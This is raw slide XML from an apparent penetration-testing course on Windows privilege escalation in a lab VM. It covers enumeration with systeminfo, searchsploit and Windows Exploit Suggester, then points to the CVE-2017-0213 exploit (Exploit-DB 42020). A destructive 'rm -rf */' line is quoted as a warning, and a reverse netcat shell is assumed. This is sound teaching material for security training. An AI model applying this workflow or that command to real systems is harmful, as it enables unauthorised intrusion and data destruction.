            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>We will assume this limited shell was gained using other means</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Open up a command window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360E-6B67-2041-A387-FF86394B0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169" y="846753"/>
            <a:ext cx="4691831" cy="4030046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247413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0051-B8BE-431E-B5C7-029C0C4AC2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Netcat to Reverse Shell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4F9968-A590-456B-A3D3-D63D0FD3C9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0" y="921704"/>
            <a:ext cx="6527399" cy="395509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 dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>From windows 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, multiple sessions are not allowed simultaneously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C217A-4FDE-D143-848E-0685963B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1" y="1850494"/>
            <a:ext cx="2660561" cy="2207588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FC18CA-9958-C44A-A7F1-50C23453B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606" y="1850494"/>
            <a:ext cx="2619909" cy="2207588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BE7B0-741A-AC47-A2CB-2C7241C4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80" y="1850494"/>
            <a:ext cx="2674273" cy="2207587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt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1844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6F15D-60DF-4401-9564-B2E9AAC2F7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Finding a vulnerability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206AE7-DA21-48E8-BE85-5A38211AC7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we're attacking the Windows VM, we'll first need to identify a flaw which may be exploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our goal is privilege escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can assume that a reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> shell is available from previous sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Starting off with your reverse shell, grab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>systeminfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>systeminfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Like anytime we're grabbing loot or enumerating, make sure to copy or save the results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy and paste</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Save to a file in Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add to notes about target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D36DC-54CA-1E40-B5D3-13FE87F2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51" y="3444397"/>
            <a:ext cx="3152411" cy="1432402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill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5392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AE0ED-A112-45E6-9A64-1CC500B0D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Try it!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4119D2-0DFB-487C-ADA3-A903E927B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5580" y="770450"/>
            <a:ext cx="8572840" cy="4111651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Now that you've reviewed the source code, are you confident that it won't</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0"/>
              <a:t>rm -rf */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Try running it, we are using Crossfire 1.9.0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Failed!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BBB17-C524-4356-B749-49E465E0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" y="1457489"/>
            <a:ext cx="6607828" cy="2040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A5B6B-5495-4E6F-ABF3-26ED7250D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6" y="3582114"/>
            <a:ext cx="5520466" cy="869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2815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78954-1E66-4BD5-9A36-63871C70C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Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Esc Vulnerabilities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70F412-AF6B-4E97-BFD6-F4F0D97C9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5580" y="818337"/>
            <a:ext cx="8572840" cy="41461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should first examine the running software for vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For commercial software, unless it's specifically in scope, we won't be doing much new research or testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Focus on published flaws (CVEs) and available exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>systeminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, we have the build number of the OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS from Microsoft:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Build 17763 = Windows 10 version 1809</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0432FF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-32238/version_id-265299/Microsoft-Windows-10-1809.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0432FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0432FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS from Course Materials:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Build 14393 = Windows 10 version 1607</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-32238/version_id-200932/Microsoft-Windows-10-1607.html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Useful info: Windows Version History</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Windows_10_version_history#Channels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797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AB8FF-6C22-4E29-A22B-292E71D2EA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8CF17D-0996-1041-9C3D-ED1C7186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38" y="969302"/>
            <a:ext cx="5006715" cy="2243575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00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F89178-D82E-F34E-ADED-5D22C636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962" y="2657556"/>
            <a:ext cx="4572000" cy="2232719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill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13955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894F3-7D80-47BC-824B-EB90B52D20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err="1"/>
              <a:t>SearchSploit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200A3-6045-4AF4-8FAB-EFDD552935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 dirty="0"/>
              <a:t>We can start to see what options for exploit might be available, using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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 err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -t windows privilege</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With 150 options, it's not realistic to try these all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can however research each one to see if applies to a vulnerability in Windows 10 v1809</a:t>
            </a:r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 err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -x [EDB-ID]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea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6B699-8281-004B-9A4A-58AFFF04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6" y="3261961"/>
            <a:ext cx="8088228" cy="1291519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill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10483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67CF1-4194-49CB-A72A-CB44278F1A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Other Options - Automated Tools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2FB4BF-4BEF-4D2E-B921-35422DBE92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 dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Get a copy of Windows Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Suggester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> NG, update it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/bitsadmin/wesng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/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>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>git clone https://github.com/bitsadmin/wesng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr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>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>wesng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr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>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>python wes.py --update</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Finally, run it against the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>systeminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> output from your target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/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>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>python wes.py -e systeminfo.txt </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>You can output this to a file or just browse in your window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>There should be a lot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483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B58A6-570F-451B-859A-DA02DD092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3F9AC-E742-4A07-8B16-C77430D201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7868" y="722921"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Results for Windows 10 version 1809 - Nothing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>but there are exploits in the wild that will work!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Results for Windows 10 version 1607 - 45 vulns and exploits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931C9-9E03-1E43-B428-04FB02E92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61" y="1344232"/>
            <a:ext cx="5099891" cy="1096751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="0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E28466-86E5-4EDA-B9C9-914F7CA9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354" y="2887538"/>
            <a:ext cx="4850295" cy="1917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C5376-A929-4AE3-B95B-D68BF218A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07" y="3462349"/>
            <a:ext cx="4086971" cy="1605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5109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A1AD-B504-4054-8F93-91AFEA3891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Automated Tool Problems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D43C08-EC0C-429F-978B-03C8C1540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As with any automated tool, it's not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>smart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cannot do any analysis, just doing simple comparisons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relationships of exploits to vulnerabilities are static</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It asks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Is this hotfix installed?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Yes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>No: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It also doesn't look for anything else, like vulnerable programs for misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So what's wrong here?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E403C-CA76-4D32-A2FF-E82FACA59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580" y="4549065"/>
            <a:ext cx="8572840" cy="3277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5522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97637-828F-4143-8376-FFC18DB587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Exploit not compatible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8A00D9-3A98-4F76-88D6-766A2C7083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804826"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>A few minutes of searching can save you time and frustration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Don't run exploits you don't understand what it's doing or what it's targeting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Example below of exploits that were listed but won't work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>"An exploit will look like a hammer and every vulnerability will look like a nail until you understand what it does."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CDEE4-D730-46B3-90DB-DB98DD527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731" y="2506593"/>
            <a:ext cx="4581138" cy="846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B4EBC-4ACB-4138-86AF-FEC4250EF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381" y="3602587"/>
            <a:ext cx="5961019" cy="1301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51895F-8DDD-4FD6-A0CD-C5CD5A273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7402" y="3149071"/>
            <a:ext cx="3630051" cy="100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64214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51F84-EF49-4C95-9023-BDA96C275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5CB60C-5E50-40C4-AE99-736B19D0E1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Windows 10 version 1607 vulnerabilities, the results of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and of Windows Exploit Suggester,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify some "findings" as either:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A false positive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Possible true positive - more research and testing required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tips for analyzing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for easy ones to write off, obvious findings that are not applicable to the system under test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compare results with actual running services, installed software, and configurations of the specific finding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit types - only interested in Privilege Escalation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7929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B2F8D-2C47-4F7C-B8A8-D822D6CFE2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073979-CD9F-424D-A236-2CAF80BAF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Spoiler - One example exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Note this only works against Windows 1607</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Patched in 2017 (Windows 10 version 1703)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0213</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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25202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5B7A5-2C76-4CCC-B3EA-E1324561EE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Review the Exploit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C2E3CC-B06A-4596-BBB6-F9A8F43DBE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 dirty="0"/>
              <a:t>Exploit-DB # 42020 - Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - COM Aggregate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Marshaler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/IRemUnknown2 Type Confusion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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 err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -x 42020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.exploit-db.com/exploits/42020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Same code: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=268768</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When accessing an OOP COM object using IRemUnknown2 the local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unmarshaled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> proxy can be for a different interface to that requested by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>QueryInterface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> resulting in a type confusion which can result in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EoP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76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A1AD0-5FD8-4FD5-AE9F-7B536367F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Problem? Debug!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85A8D-69A4-430D-8863-A6F4689804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exploit didn't work, but we know it's not a local problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our exploit from past </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>labworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, we can test it and verify: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Try the exploit again but use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> this time to learn more about the crash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What did you see?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Watch memory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6B6D3-9671-43FF-A976-6E35F90E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7" y="1529491"/>
            <a:ext cx="8860221" cy="184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55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35D6B-7BD9-40B7-ABED-F02A970BB1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Exploitation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940ABB-0958-456B-8FB0-29EB89A834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 sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>This exploit will open up a system shell on the desktop of the current user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>The code needs to be compiled on Windows in Visual C++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Cross Compilers like MinGW will not work without significant fixing and changes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Download the binary here (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Unzip Password: 6573</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
